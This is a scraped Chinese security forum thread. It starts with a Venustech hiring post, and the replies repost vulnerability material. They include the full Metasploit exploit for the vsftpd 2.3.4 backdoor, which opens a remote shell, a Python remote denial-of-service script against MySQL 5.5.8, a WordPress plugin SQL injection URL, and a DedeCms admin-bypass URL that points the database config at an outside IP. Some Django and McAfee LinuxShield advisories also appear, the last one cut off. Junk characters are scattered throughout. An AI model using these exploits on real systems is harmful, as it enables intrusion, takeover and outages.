最近看过此主题的会员

返回列表 发帖

[人才招聘] [招聘] 启明星辰研发招聘

  • 招聘职位: 其他职位
  • 公司名称: 启明星辰
  • 工作地点: 北京
  • 专业要求: 其他 
  • 学历要求: 本科
  • 工作经验: 2年以上
  • 职位薪金: 面议
  • 年龄要求: 不限
  • 性别要求: 不限 
  • 公司网址: http://www.venustech.com.cn
  • 简历邮箱: xiaoyan@sitedirsec.com
  • 联系电话: 00000000000
  • 在线QQ:
  • 安全助手: 通过非安全中国管理人员招聘/求职,QQ群:57116771


  • ++++++++++启明星辰相关说明++++++++++

    站内发信给我就行了。/ M; x; E6 e' x" a

    6 m. w0 u) M& `- ^, a/ E

    一、研发中心:Linux C软件工程师(若干)

    岗位职责:

    1.% u8 h6 F* Y* E* T$ J
    安全网关,防火墙,IPS等嵌入式设备软件开发,维护

    岗位要求:

    1.
    ( I: U* Z3 A2 j$ K精通C语言编程

    2.
    5 W: X" V: `/ P; G( c0 ~' v熟练使用Linux操作系统,精通 Linux下C语言编程

    3.% \2 s( g, s% T2 ?  ]
    精通TCP /IP 等网络协议,熟悉应用层协议,及协议分析

    4.9 [: a8 l$ T0 ^  }+ x
    熟悉网络安全协议及路由器、交换机、防火墙等安全设备

    5.
    8 x: m( s. F0 J4 v* ~2 T熟悉Linux内核及开发

    二、研发中心:测试工程师(若干)

    岗位职责:

    1.1 U( l9 v: X+ {% x0 H* V
    负责产品的系统测试、集成测试工作

    2.
    & e, r. E" K' @. }负责产品用例的编写,执行、修改

    3.* ^  @. a. D, H5 Z5 v
    负责产品性能的测试

    4.
    5 {6 t: K7 e+ d2 q& a负责对外项目的支持和测试工作

    岗位要求:

    1.
    2 T. V; _" a  F" L* ^掌握基本的tcp/ip知识

    2.
    4 x9 \+ J1 v8 b# w3 \3 P9 @+ T( P+ P数通基础好

    3.% {9 u: q+ Z9 z5 F
    对linux有一定的基础

    4.) V. g5 c9 `: z
    掌握数据库的搭建和使用

    5.; R+ P8 r5 C+ W5 `4 C
    至少熟悉一种编程语言C/Perl/VBS/TCL

    6.( D2 f# D) e3 u  N3 N' _! g0 v+ m
    熟悉测试用例设计,熟悉系统测试,熟悉压力测试

    7.1 e6 V% i0 i4 v" q
    熟悉防火墙相关原理,对于防火墙的一些功能特性有一定的了解

    8.9 X' ]( Y# \( h. @! G
    对网络安全设备在网络中的部署有一定的认识

    9.
    - [" e/ ?) b( W& P9 C7 N4 Z6 i掌握测试工具的使用:Loadrunner、包分析软件、思博伦或IXIA的测试仪

    三、研发中心:安全事件工程师(若干)

    岗位职责:              

    1.
    : T$ S( |* k2 w- k6 A/ z2 Q2 ~
    木&马检测服务、WEB漏洞扫描服务的实施

    2.
    ' G  S' W/ A/ v- B8 E% s
    对服务客户的技术支持

    3.
    0 b$ `$ Q0 @; C# m
    对于网页木&马,WEB漏洞、蠕虫、扫描、拒绝服务、缓冲溢出等的研究

    4.
    * f  A' @: T+ ?& @
    对IDS/IPS/UTM/TDS/WAG/322等产品的安全事件库进行日常升级和维护

    5.
    , I- d, d& P% @7 b3 w7 p( }& x$ G
    对各种攻击手段的研究;TCP/IP协议的研究;逆向工程的研究

     

    您可能还想看的主题:

    启明星辰招聘

    非安全中国网免责声明 1、本帖所有言论和图片纯属发表者个人意见,与本站立场无关;
    2、本话题由:小妍发表,本帖发表者小妍符合《关于版权及免责声明》6大管理制度规定,享有相关权利;
    3、其他单位或个人使用、转载或引用本帖时必须征得发表者小妍和本站的同意;
    4、本帖作品部分转载自其它媒体并在本站发布,转载的目的在于传递更多信息,并不代表本站赞同其观点和对其真实性负责;
    5、本帖如有侵犯到贵站或个人版权问题,请立即告知本站,本站将及时予与删除,并致以最深的歉意;
    6、本站管理员和版主有权不事先通知发帖者而删除本文。
    收藏 分享

    VSFTPD v2.3.4 Backdoor 命令执行漏洞
    ################################################# $Id: vsftpd_234_backdoor.rb 13099 2011-07-05 05:20:47Z hdm $    ## This file is part of the Metasploit Framework and may be subject to      ## redistribution and commercial restrictions. Please see the Metasploit     ## Framework web site for more information on licensing and terms of use.# http://metasploit.com/framework/                                                    #################################################1 ~4 w8 f/ m& L- U
    & O. A$ g1 U& f  ?6 w

    ! ?5 Q. L/ W/ l; x
    ( z& s( M  x! Qrequire msf/core$ D* `* \" I; R

    0 i1 c# X) D# M% Zclass Metasploit3 < Msf::Exploit::Remote, w. n3 U; D+ f
    Rank = ExcellentRanking
    8 N; @+ q" C- H5 e/ s5 X) P2 Y2 G4 F% R: Y/ U; K
    include Msf::Exploit::Remote::Tcp
    8 x8 v4 z2 J$ g/ h
    4 B  [) m  ]! d. P, c: @) |' v  adef initialize(info = {})
    * `2 r" {8 a# Asuper(update_info(info: b' \- K6 W" J& x/ w) Y
    Name => VSFTPD v2.3.4 Backdoor Command Execution4 ^: S/ y7 h. @; \
    Descript_ion => %q{
    6 A1 M4 g' g- b# p# YThis module exploits a malicious backdoor that was added to the VSFTPD download
    3 ]2 _6 @7 y7 ~% zarchive. This backdoor was introdcued into the vsftpd-2.3.4.tar.gz archive between
    # E5 |9 k6 E1 r. uJune 30th 2011 and July 1st 2011 according to the most recent information/ b, o2 ^% s4 K1 s* S- v' ~5 I5 |
    available. This backdoor was removed on July 3rd 2011.( f1 q" E! F+ A) O# e. l5 w8 }6 n# w
    }2 K4 E; W/ m  c/ {: H, G( A) F
    Author => [ hdm mc ]
    & Y5 g: h# v0 |9 U, z. eLicense => MSF_LICENSE* }% }# \" e7 u1 k, l0 A
    Version => $Revision: 13099 $- G2 {* f0 j  X2 X. F" O
    References =>' e# B# w3 y! n$ H& b
    [! q1 Q4 s% `. @. F% w0 U
    [ URL http://pastebin.com/AetT9sS5]5 l  P$ E' C, i% A3 ?$ R
    [ URL http://scarybeastsecurity.blogspot.com/2011/07/_(使用时去掉_)alert-vsftpd-download-backdoored.html ]
    0 m% [. r% k0 l: V/ t5 {$ ^]* V1 ?0 x. G- Q& `
    Privileged => true
    ; a. \$ [3 s- `  D3 }, CPlatform => [ unix ]# q5 B* \% @5 h# O+ V  m$ J
    Arch => ARCH_CMD+ V6 y* E* z" n, V8 u* Z! R: q
    Payload =>
    1 t. k# G0 O3 N: }: V+ H. R% o) ~{
    " A+ i* Y+ j; g& y8 k, {8 O, bSpace => 2000+ S! S, q( Q% L+ b
    BadChars => : F5 N% H5 V1 L6 H2 Z
    DisableNops => true
    , {7 D* ^3 J: B- \1 n3 pCompat =>
    " c9 g% G& p, b0 Q7 P8 i# y) B{9 L/ t& ^7 r! E  w; c: N; E- S3 x
    PayloadType => cmd_interact
    3 V7 z9 T* k+ a6 w/ \ConnectionType => find
    4 Z9 }+ n. W8 L; \}2 y2 _$ x6 l& G% r7 }& x$ M3 z4 p
    }: c% m1 V! Z. @' s2 W
    Targets =>
    + h* S8 S( P% {9 w[
    9 T' P1 |/ i( w" {[ Automatic { } ]
    5 w/ K# _8 V! Y! [! ~9 v]# {' k/ g. x( B- `- g9 U4 O
    DisclosureDate => Jul 3 2011
    ) H9 V4 h% D/ R7 X5 c; CDefaultTarget => 0))
    & ~3 }4 H- U$ v7 D/ F; N/ V/ F4 C* Y
    ( r+ t! A( e3 ~3 p# T: bregister_options([ Opt::RPORT(21) ] self.class)2 o# ^1 R9 S; X
    end
    $ I+ j% m- t1 q) [8 q. M# C- n# j9 L( O+ ]: Y- Z6 o
    def exploit5 B! y5 ~$ @& L; m$ I/ }0 H& O5 l6 f

    ( C0 b2 b8 T" s: znsock = self.connect(false {RPORT => 6200}) rescue nil
    , a, Y2 i; g6 ~5 w) q$ u& Z" |0 Qif nsock
    8 ?) O8 e7 l2 f5 n1 `+ }8 N. {print_status(The port used by the backdoor bind listener is already open)
    . J+ t6 R4 y7 i% ~& C7 U: n. mhandle_backdoor(nsock)
    1 L/ {$ O/ `6 G. X0 R0 Creturn8 J8 `: m6 h1 v$ M9 ^
    end: I5 _6 H3 v8 |( }4 z: S
    9 Y0 b- t% b- ]" ~
    # Connect to the FTP service port first
    4 Z; }6 o! A4 R2 ?connect
    , I5 t; ]. K% {( {7 l) q, z- A; r. {- o/ i
    banner = sock.get_once(-1 30).to_s
    " O! Y2 S* d/ `, d" `2 W, l7 ^print_status(Banner: #{banner.strip})2 R0 r$ Y: b8 m) R# _- U$ u

    % p6 F% V# r2 A0 b2 K/ P: F) ysock.put(USER #{rand_text_alphanumeric(rand(6)+1)}:)
    ( k, }2 |- U% y  y6 A% O)( ]' F; q7 r+ b0 w6 v8 ]' A- \, T
    resp = sock.get_once(-1 30).to_s
    5 T  `1 n7 K: r. {' }print_status(USER: #{resp.strip})
      m4 F+ O& R* \1 N6 ]; h3 W& D) f; H& d, C, o) D
    if resp =~ /^530 /
    8 C" B' [4 M. [% c5 e4 u  X- _print_error(This server is configured for anonymous only and the backdoor code cannot be reached)
    . d( D! h  X. G+ Y( D- jdisconnect
    5 n5 Y' z7 W) ^- j: S2 u# Zreturn2 A5 b! f- A1 K, m+ l: m
    end) @. `6 j; F  b" I6 h) x
    ) w( T) I( H9 k6 q. h) ]$ Y: [
    if resp !~ /^331 /
    ! s' D3 s" R% L/ y( J8 N! h3 Q9 \3 x$ Cprint_error(This server did not respond as expected: #{resp.strip})- l4 a9 s) B# u! y
    disconnect
    2 f4 m( p; X6 \. x; {7 r: ]( D! O, Greturn
    $ E! B8 z% V( H, tend
    5 B1 r6 O$ b! K$ f8 k; }9 p1 Y' h& ^# ?( E2 u2 A' }7 R% O
    sock.put(PASS #{rand_text_alphanumeric(rand(6)+1)}' y9 z2 @% P0 D0 O. a1 y4 `
    )
    . d2 ^9 e% I' s1 q
    5 P1 C2 q" ?1 q: x3 P7 [# Do not bother reading the response from password just try the backdoor
    ' q7 p" ~; L3 r* w$ ynsock = self.connect(false {RPORT => 6200}) rescue nil
    & H% ]  f$ n$ I5 r/ \2 iif nsock
    2 ~# d: z2 t: y2 Q, x% Q0 U. ~print_good(Backdoor service has been spawned handling...). ^! p7 f# g* Z) e1 ^0 T* O+ D0 Q/ a
    handle_backdoor(nsock)2 o; H/ @' l2 ^
    return
    3 O7 A) Z4 w, E0 z8 O& qend; z: w8 o5 \- R% \$ R/ C8 @
    ; C6 A& o' h/ u& c( h
    disconnect
    8 S' B/ @3 T# Z# I+ h- D& u9 W5 Z4 }* g
    end- P  O  _) ]2 Z" u+ M6 l( w6 i* d6 L
    ' t6 |& i) @2 h0 U( {) z$ g
    def handle_backdoor(s)/ s0 D& r" A, V  Y4 D' i" h" w5 }

    & g4 A+ H9 B; bs.put(id
    ! U' g& {; ^# T& P( }4 u' K+ H( h). ]6 P6 r1 Z- @* I
    ' n4 M" Q" C. h4 A! o; z1 R- N
    r = s.get_once(-1 5).to_s& H$ K7 h( H2 C+ F: T7 R+ A
    if r !~ /uid=/
      F: a6 y: s6 W" m% h4 _1 ]9 ^print_error(The service on port 6200 does not appear to be a shell)
    2 C7 l$ c9 R8 R/ W( x6 L2 tdisconnect(s)
      j( z8 n4 g# P% e, N& ?1 T; i( lreturn
    2 A6 _' T6 Z6 a* u" n& P! Lend: K& ^+ H2 Y; n3 [. G' U
    , R7 H5 R/ Q5 F+ ?4 K
    print_good(UID: #{r.strip})
    $ W& O2 ~) K+ ~) N7 z3 o! o1 S  J0 [( S& S3 n% M6 k3 x
    s.put(nohup  + payload.encoded +  >/dev/null 2>&amp;1)/ h7 k8 Z# d# [" [( X
    handler(s)- @, G& p% `6 K3 _2 T
    end
    % H6 y8 q9 i* ?8 Z' }
    2 J5 o3 s& K9 n# ^; e& cend复制代码
    " c/ ?1 I$ }9 }; \& L" z& D2 C/ B! j
    0 ^% }8 g4 s) \' T2 `2 |5 D: E1 a
    ( \; J: G5 R* Q( v: D

    8 E* Y, m" k2 Y- k. a0 H8 a1 X/ D+ ^! u4 |5 ~! h( N

    # K8 }) _4 @8 o  Y7 N
    ( }! b- p7 g/ J1 q
    ! O# z# K2 G" ^. C5 a3 ?# L( {* Y2 Y! ]" L! I' C% U

    " B9 i7 V% j  ]  r- p+ X2 Q/ y# z# d9 z

    . V$ H3 j1 f. ~/ r6 }- i
    " F0 s$ H( ~; `( ~0 S6 b
    # h. y. H5 q4 O0 h) v1 R; ^- E( \. _" J7 t8 a& {  J

    9 a+ X$ D; X% @# |9 u, P
    0 X" L" c/ Z7 e& v2 q# O
      }) n1 N1 f, J  r公告:https://www.sitedirsec.com公布最新漏洞,请关注

    TOP

    WordPress Event List Plugin <= 0.7.8 - SQL 注入漏洞
    1. Description:
    ) Z4 n1 R% s$ h. C& t# P* Z& [0 Z/ J  / }* T& c  E4 [* Z
         8 ], q" X+ N# Q! q
      
    # \6 Y: m7 ^* W) W+ M3 u  dSQL injection vulnerability in the Event List plugin 0.7.8 for WordPress( P8 T$ O7 b9 Q; c( ?0 ^- m# D. y
    allows an authenticated user to execute arbitrary SQL commands via the id( N; V* T3 y' @& \# a- p
    parameter to wp-admin/admin.php.
    # i0 \/ _* w5 G8 R5 O. \3 x/ z9 P$ O  
    7 g: ~" }; c, j- g6 o$ `   
    ) S8 u0 |7 x' I5 h: u: \# S# f. d  - l8 |, o# B( t/ F, _3 o$ b& @
    2. Proof of Concept:1 i4 F, E& n& ~7 u# L
      ' S* m4 _  W. A9 Z4 i
       
    / V) @; ?( M. q  
    7 p$ B% Z9 j, chttp://[wordpress_site]/wp-admin/admin.php?page=el_admin_main&amp;action=edit&amp;id: |" A  T! G& J4 B/ u# ^# Z! h
    =1 AND SLEEP(10)9 E6 e3 S; E; ?  \6 t' O  b
    - J) u$ @6 Z1 ^6 y" u' w
      ' X- B) H  u5 d1 ?
       7 B/ T! C* B% m, N+ ^4 D. D
      + d; t2 |; Q' B7 [3 f0 }( n
    3. Solution:4 x% D. Y% ~# g) @* ~2 j5 G
      * b  {- B7 @. T1 o
         
    1 B% {  _* T  U6 E) n  7 J: t0 z( Z$ r. F
    The plugin has been removed from WordPress. Deactivate the plug-in and wait6 c! o, ^7 y- K  S- p) l
    for a hotfix.
    3 q$ r6 m$ P2 ^, Q+ d  
    + ~+ |! s' o9 e! u. n9 x5 c; C   4 ]8 q+ ?2 a2 a2 }
      
    ' i0 ^8 ]- x2 X4. Reference:$ [4 E5 T$ \6 f$ w. Z+ b
      
    $ Y9 m4 y' y+ E8 v* U/ k   / `( e9 q. z! O' U
      1 g6 v2 |1 q: w
    http://dtsa.eu/cve-2017-9429-event-list-version-v-0-7-8-blind-based-sql-inje+ D0 P" z% p; y( K! I) b
    ction-sqli/
    % F3 r& _, M( A5 e) W  
    ; l2 e1 j% o' Khttp://www.cve.mitre.org/cgi-bin/cvename.cgi?name=2017-9429
    + P3 f5 S) k; \6 ]8 m0 O" Z% `- L/ \# y9 u  F) L
    ) X8 F6 }& J$ ]

    0 z" i  x, ~! Q# h
    % w, A: t8 p9 S, l+ M8 x2 ^! k& R2 U$ H" t. [

    6 k0 v, J7 a: p8 k) P$ z% P  ^4 S% P* y5 P$ b* Q: c

    * q  a, Z/ v% T' M1 i! Z+ x; x/ h! t, r9 Z$ V
    5 ~7 M: B" W8 T  @/ z! Q

    1 r; l) ]$ J$ `, H6 i0 t3 |, }9 i

    . T/ L$ b# m( @7 s% c, A. T
    8 f3 i2 j1 T; H: m& X' c: U) I# }' M1 ?( l

    , _- ^& `! g' {3 \. z; D8 X, L. l$ l3 ^4 n3 Z% [
    3 A; s" g, B4 x3 R. p$ r1 h" T$ M
    公告:https://www.sitedirsec.com公布最新漏洞,请关注

    TOP

    MySQL 5.5.8 远程拒绝服务漏洞
    import socket, sys
    " k7 F9 Z* R, w. r# I
    & {: I& }1 q  U+ n6 cprint "
    8 `+ V( @& [, q6 W- d) h": \8 J7 U3 y" t$ o
    print "----------------------------------------------------------------"
    ! {6 d2 V+ {' J1 \7 l+ w7 P8 Mprint "| MySQL 5.5.8 Null Ptr (windows)                                |". h8 Y1 d5 ~& |6 N: w9 Z
    print "| Level Smash the Stack                                         |"
    9 k# d+ f/ c9 p: Y+ y, wprint "----------------------------------------------------------------"
    , C- z' u4 y- J8 G5 J9 ]print "+ ]  `- ]" o8 m- o9 V5 E; n, i' T
    "
    . e7 ~( a# m* ~% ` 4 f; u0 Z% y' \* F: H4 f9 q+ e
    buf=("&amp;x00x00x01x85xa2x03x00x00x00x00@x93x00x00x00x00x00x00x00x00"
    $ w" X; P6 l) I8 Z7 U0 B- A2 q"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00rootx00x00")# t0 F' A) |! H! \9 P) `- L) H% k

    , v! N% t4 u7 I9 [3 ]5 X% o1 dbuf2=("x11x00x00x00x03set autocommit30")
    0 W' G9 _5 w! E: h 4 ~7 C3 t6 X' X# D& l
    def usage():
    8 R; y1 N1 P$ bprint "usage : ./mysql.py <victim_ip>"
    0 y1 p' Y" v1 Wprint "example: ./mysql.py 192.168.1.22"( b0 @2 [. f- \
    : U  _0 R9 x" C; V* m/ b( F
    6 l$ w/ z+ l4 o
    def main():
    9 H; U# J* F+ b& eif len(sys.argv) != 2:6 x, e2 c2 B2 i  M' z! |' o
    usage()
    3 d. M+ b( E0 I  A# `; msys.exit()
    # S) ~7 y2 }; }& H  Z$ l! ^) `s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    , q1 A+ k  }/ G+ r   o+ W' m9 W8 {
    HOST = sys.argv[1]
    , X; J; v4 {, ~- t; A9 k# g" GPORT = int(3306)
    $ p. C' \0 K# p& @0 @  u( Is.connect((HOST,PORT))) e* D/ S: n1 X) z2 {& |
    print "
  • Connect"
    : t/ X/ h/ s$ q1 P% M, M0 w6 Cs.send(buf)' B% i: F$ o4 \
    print "
  • Payload 1 sent"* s' o! r; l8 B9 F4 S1 Y' Y
    s.send(buf2)
    , n4 i/ X! c" Oprint "
  • Payload 2 sent' A, w+ @% N) X/ V, T" U- A
    ", "
  • Run again to ensure it is down..
    0 x; m" f$ F' ~. C. I  H"1 l, Y8 T5 A& N2 v- \+ n
    s.close()8 W4 Y' b. a# l( ^8 `

    % l, @3 z$ ~! r& U- i" jif __name__ == "__main__":2 E+ J$ c/ Z9 _% U, R& L4 g3 Q
    main()3 o  l# \. n- f& E* u7 |

    ! s9 O9 X" g, \1 f  v6 K. U9 h. w
      z3 C. v, h5 T
    ! R8 p* ]1 o. p! x+ x
    * k2 e, L* t, k. j
    5 @& m, m" O6 f7 H! [: y0 Z$ D7 [4 s4 g/ j2 N0 d6 j4 f  j

      U  x- _2 [/ L2 S5 R8 \
    # h; U: K9 ]4 a' K" k
    $ r- z9 T5 J) z& r% T& {8 G! G8 `3 @/ ^
    * R0 K$ e& s' M- H( }1 \$ W9 ?" Y/ v
    5 _3 A- o  C* {+ Z
    ( O" g: k9 G* @; v
    # i0 g5 P, }4 B$ Z$ I

    * Y2 z8 G  ^, h. A. O
    . s" v: i' Y- `! \6 R6 j9 [5 S% X3 H! A- T; _9 l2 O
    9 K' D& L% A& H3 j# f
    公告:https://www.sitedirsec.com公布最新漏洞,请关注
  • TOP

    手把手教你装Linux系统-设置虚拟机
    - P' A2 [& O- }& p# `
    http://www.sitedir.com.cn/video/4.swf
    8 S. f7 `4 i2 J! A/ n! g6 r6 `% d- ]1 L. p* L2 @8 a
    1 \; E: @5 B/ ~) n: `% o" p. B* A1 m

    + A" `3 \! o. u  k  e5 l
    " F9 \: f. y, l& K2 L" s$ O
    1 D- v/ S: F& Z& V/ G1 s  x  L6 D5 O
    + s/ W0 D# k) \' @9 C/ g3 C0 Y" n

    1 ]3 A. l' l0 s9 q( Y2 f/ M9 P7 Q

    0 e/ y3 r3 M9 o+ I% s
    + V4 ^2 \% S) j: S+ D& D* |' Y' O* k1 W
    * k, x3 G9 Y& f4 d9 S; A7 M( s. e
    ( l/ d1 u7 z# R/ l

    & b2 y: u0 V  z& c- m5 |; m
      l5 {7 C8 V" }! \! X, r
    : r8 F$ S7 x4 j! Z6 @
    + f' y* K2 `' p" x: P公告:https://www.sitedirsec.com公布最新漏洞,请关注

    TOP

    织梦(DedeCms) v5.6-5.7 越权访问漏洞
    http://www.XXXX.com/织梦网站后台/login.php?dopost=login&amp;validate=dcug&amp;userid=admin&amp;pwd=inimda&amp;_POST[GLOBALS][cfg_dbhost]=116.255.183.90&amp;_POST[GLOBALS][cfg_dbuser]=root&amp;_POST[GLOBALS][cfg_dbpwd]=r0t0&amp;_POST[GLOBALS][cfg_dbname]=root
    0 E: }2 |7 T2 w! N" x! A+ g. M9 O% E
    把上面validate=dcug改为当前的验证码,即可直接进入网站后台

    + o2 u% O3 L7 t0 o! c* P
    此漏洞的前提是必须得到后台路径才能实现

    9 D/ a6 |* m- B6 [4 f; Y/ j! d
    官方临时解决办法:

    ! V7 U5 t* |4 s5 D
    找到include/common.inc.php文件,把:
    # A7 W  m8 }/ @, t7 C4 q' O/ h% \
        foreach($_REQUEST as $_k=>$_v)
    2 g- P+ x: @) |" T0 D% t    {
    % d. u: e: c5 D1 U6 o# l  j! Y8 P        var_dump($_k);
    0 C1 p$ B5 D+ I        if( strlen($_k)>0 &amp;&amp; preg_match('#^(cfg_|GLOBALS)#',$_k) )5 n2 ?4 `& f" j6 @( u/ r, T
            {
    # i5 a! Q9 ?& Q9 D            exit('Request var not allow!');# Z# ?& J/ V% m1 k( u. B' n
            }
    9 s) q8 W& H% L/ y* M5 {    }

    ) o9 y! X0 b7 I/ `$ j
    换成:
    1 H+ [* h' f0 n. P9 g% X
        //检查和注册外部提交的变量
    ) K- x, U& u+ Q, ^3 I+ R3 w8 Y    function CheckRequest(&amp;$val) {; c* `+ c3 p( Q1 P. g
            if (is_array($val)) {# r$ d# S8 B5 \/ X# Q$ f
                foreach ($val as $_k=>$_v) {+ d% R3 O& J, H, f8 H" H
                    CheckRequest($_k);
    + b% j5 l2 F8 M                CheckRequest($val[$_k]);+ ?4 ?' S$ L! s9 Z5 p4 i- u+ e
                }  m) e! i5 m  \" m* A/ o2 b
            } else; I5 p( X+ t& E( H9 y5 Q
            {
    6 _% s5 ^; s6 L, V  }            if( strlen($val)>0 &amp;&amp; preg_match('#^(cfg_|GLOBALS)#',$val) )& u/ Z3 q2 F) t$ G! K
                {
    ) b1 w  j- b) u5 u' Y6 a                exit('Request var not allow!');
    * z& s7 c& \& z3 E5 U  U            }3 _1 A$ V6 ]) M9 D% i7 b
            }
    6 w$ b, A8 R- X    }* a7 |* f( J5 ^2 [9 J$ N
        CheckRequest($_REQUEST);; p* Y( W! I2 G; d
    / b& g" |8 Z" k6 K) ~
    ' w" F2 w: O4 {3 v! H

    " O; Q6 R7 O4 \8 V, C2 T+ \, H$ _2 `
      F% @( ]9 J) q$ [
    ' l- G6 i4 R2 z' o7 }* r8 X8 U
    1 D' W! [8 {! ^9 ^8 N# S
    0 T: m' S+ W$ C. z

    1 P$ L3 p2 \% M1 k
    $ V. B# t& W4 [! n4 T5 n4 ~: Q/ r5 o6 W7 L$ H

    8 I. y, F7 Q1 s$ V- y' g
    ( b3 [8 p+ B5 o, J" G# X9 b! D+ x6 O( |

    " K- o0 M/ ]! X% o9 ]' M- w8 C( ]" X
    9 q; \3 j( Z4 U  e& S

    9 H$ ?2 |5 O# b' d6 W+ t( }& L/ a! _: z, T& m
    公告:https://www.sitedirsec.com公布最新漏洞,请关注

    TOP

    手把手教你装Linux系统-设置虚拟机工具
    <P align=center>
    3 ^2 ]& @- I, T" t  l: `( v( i1 t+ T
    http://www.sitedir.com.cn/video/8.swf[/quote]2 `4 x& h: f/ k" j0 t2 @
    % y3 v" M6 Q+ P: J3 a( U
    6 O. |: v6 N# G! Q+ Q9 p% T- }

    0 I0 d/ k" o, W9 S# x: M; d
    ! n3 t7 U& h* g" n
    * ^8 u& I7 v: R4 o) H1 g& `+ u& L
    * _4 `! L$ k1 N. C' `0 a) I

    0 y& _/ ]% P$ A, ?- [" D1 R
    , c/ E; j0 ?4 V
      j. c2 T8 Q% b# X1 w
    , \: s& o7 w. l2 Z8 ~) ?# \, e: H& Q& l$ q2 e4 ?

    / z! U) h. |- z! [/ l" f' q+ g0 w- m6 }
    * O7 ]6 r4 p& [$ ^

    3 }9 v: V. H7 G8 f7 @7 k# y# G# P( F9 _! j$ o$ c, Z6 C

      B" y( w) q6 s$ l# @公告:https://www.sitedirsec.com公布最新漏洞,请关注

    TOP

    Django开发框架多个安全漏洞
    发布时间: 2011-09-12
    3 ?2 F+ o6 G- J% i8 w: [. q2 k
    影响版本:
    7 \5 p, u, V; U& gDjango 1.2.57 D$ _/ R4 _2 Y3 d  d1 V( B8 ?
    Django 1.3 beta 1
    ! Q, W* o  Z! L  T6 A0 kDjango 1.2.4
    - K! N6 w" k0 \Django 1.2.2
    " |- Y9 o- P: H& a" O6 C0 ~" |+ d7 ZDjango 1.2

    " g* _7 n7 C1 V
    漏洞描述:

    8 ^" N) {3 d& U/ \& K0 O* V
    Django是一款开放源代码的Web应用框架,由Python写成。# S; K" `& Y; n$ G3 ?
    Django存在多个安全漏洞,允许攻击者获得敏感信息,操作数据,进行缓存毒药攻击或进行拒绝服务攻击。
    * a6 F2 K7 J" N3 q1)当使用缓存后端时django.contrib.sessions中处理会话存在错误,可被利用操作会话信息。要成功个利用漏洞需要已知会话KEY和应用程序允许攻击者使用合法会话KEY储存字典类对象到缓冲中。
    ' n+ q1 R' X7 p0 R5 _2)Django模型系统包括一个字段类型-- URLField --,用于校验提供的值是否为合法URL,如果布尔关键字参数verify_exists为真,会尝试校验提供的URL并解析。默认情况下,底层套接字没有超时设置,攻击者可以利用此漏洞发送特制URL消耗所有服务器内存,造成拒绝服务攻击。9 u6 g/ B+ L& Z$ n. Z
    3)当校验提供给"URLField"字段类型的URLs处理重定向应答存在错误,攻击者可以利用此漏洞把重定向应答返回给"file://" URL,可判断服务器上的本地文件是否存在。  u% n4 ]5 v/ J# ?/ K3 R, V
    4)当生成重定向应答的全路径URL时处理"X-Forwarded-Host" HTTP头存在错误,攻击者可以利用此漏洞进行缓存毒药攻击。
    % |! }" F" l2 Y5 n- ]
    细节参考:
    ! s6 `: f# R, phttps://www.djangoproject.com/weblog/2011/sep/09/security-releases-issued/+ l# A; R. R3 @$ G4 E; W; s8 q
    http://secunia.com/advisories/45939/
    ) v6 d2 W# N$ i% F- S6 v0 U' o

    7 G' d: P( m6 g0 M5 |; d/ z* e5 J8 i( K

    / Y* O) f" y2 E) @, x! S' Q1 E
    2 s# x- h9 n( }# H
    ! H& ^- x3 W( ^2 o- k* X- d. T! r% c
    . v: l  k4 B1 T

    ! V' s. S. j) Z5 Z4 \, ?
    . A' ~! `( l3 f) T  v% _# P# v2 B2 m0 e0 t- W. v, R6 \7 q$ x
    . j8 E7 t" f& l  w

    ( D5 Z) i! _+ O+ B2 m6 c/ {, P' N+ H( d

    6 ~% }( |! o7 I' H
    8 q% ]% J+ u9 J# p  H1 ]% r6 G! s: Z" s4 n2 V* ?) P4 ^
    2 q- U% O* t% i6 g% `1 J$ X
    / L3 Z& X5 T2 V0 g) C( h+ U& i

    7 [4 Y+ \& }) b0 \/ q公告:https://www.sitedirsec.com公布最新漏洞,请关注

    TOP

    McAfee LinuxShield 本地/远程代码执行漏洞
    McAfee LinuxShield remote/local code
    & m3 r# `2 L  L1 I影响版本: McAfee LinuxShield <= 1.5.1
    7 c$ }# l- {2 a远程攻击: Yes / f' A8 ]% m% c) e
    本地溢出: Yes3 @9 J& N* f8 E- X* S. n# Z
    背景阅读:
    7 ^% s( {) M  a- J9 \5 R===========' R9 s' |% `  A# t3 L+ W

    , p" L( c& h3 \8 o  z; y4 @LinuxShield detects and removes viruses and other potentially unwanted; T7 l( e% I5 F( h, y6 \3 W- x, g
    software on Linux-based systems. LinuxShield uses the powerful McAfee* D1 h0 W# G1 Q7 w" P2 E
    scanning engine ?&amp;#65533;&amp;#65533; the engine common to all our6 a# g1 k; g, i1 t8 L- h
    anti-virus products.
    0 c; F% v. H" n+ ^
    + C4 S/ k' U" Z) P6 m7 mAlthough a few years ago, the Linux operating system was considered a, Z( i$ I3 p% A0 [# x1 J" I
    secure environment, it is now seeing more occurrences of software; q* Q" }, z9 F1 _0 _/ @1 T
    specifically written to attack or exploit security weaknesses in
    * q9 u' Y3 `& m/ }0 }: O7 K- h  @Linux-based systems. Increasingly, Linux-based systems interact with
    2 H0 h5 s; f! i- @, X' mWindows-based computers. Although viruses written to attack Windows-
    : h/ U( n7 @3 k8 m6 |based systems do not directly attack Linux systems, a Linux server/ O2 l- A, u& p  j* k
    can harbor these viruses, ready to infect any client that connects to
    % V  @% N% Y( ?, l0 xit.
    - a( ?. H- u! I' R% ~/ K9 T
    - R6 M+ m# `9 }5 {8 c1 MWhen installed on your Linux systems, LinuxShield provides protection
    4 Q0 z2 ~% j# q6 x) Kagainst viruses, Trojan horses, and other types of potentially' `) l  F# x9 V& \# u
    unwanted software.
      Y' l+ y' w6 R! ?1 N1 `  b4 E; ~- x# I; |4 P1 n
    LinuxShield scans files as they are opened and closed
      F% j1 @  I* r3 d5 Y5 v' W?&amp;#65533;&amp;#65533; a technique3 }. l% g& K! c" _7 X/ H
    known as on-access scanning. LinuxShield also incorporates an
    $ Q( w9 c1 D1 Y1 ~, `8 S( @on-demand scanner that enables you to scan any directory or file in( K% }- t+ d4 M! C7 Q8 Q) k1 `
    your host at any time., Z: w. t2 i$ v, ?% U
    . o4 }/ ]* ~& M5 c9 ~
    When kept up-to-date with the latest virus-definition (DAT) files,1 G7 N" m2 t  Y/ j/ h
    LinuxShield is an important part of your network security. We+ X# E3 W) T; Q4 d: U2 z: C
    recommend that you set up an anti-virus security policy for your
    , I2 \: q! E. t$ ]3 Qnetwork, incorporating as many protective measures as possible.
    ) k( h- t; {/ o% p
    4 m) q4 B7 p/ X! j7 n6 _LinuxShield uses a web-browser interface, and a large number of: |$ a) X8 N* Y" o
